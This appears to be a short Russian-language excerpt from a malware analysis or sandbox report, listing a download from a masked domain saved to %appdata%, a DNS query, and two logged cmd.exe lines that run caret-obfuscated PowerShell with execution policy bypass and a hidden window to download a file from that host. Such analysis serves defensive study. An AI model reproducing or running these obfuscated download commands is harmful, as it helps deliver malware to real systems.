Техническая информация
- http://www.al###pena.top/user.php?f=##### как %appdata%.exe
- DNS ASK al###pena.top
- '<SYSTEM32>\cmd.exe' /c p^O^we^rs^h^el^L.e^x^e^ -exec^UtI^On^pOLI^cy^ ^ByPass -NoP^rOFi^l^e^ ^-w^indOwstyle hId^den (n^e^w-oBj^ect ^system^.net.^we^B^cl^ieNt^).^dOwn^L^Oadf^I^l^e('http://www.al###pe...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^O^we^rs^h^el^L.e^x^e^ -exec^UtI^On^pOLI^cy^ ^ByPass -NoP^rOFi^l^e^ ^-w^indOwstyle hId^den (n^e^w-oBj^ect ^system^.net.^we^B^cl^ieNt^).^dOwn^L^Oadf^I^l^e('http://www.al###pe...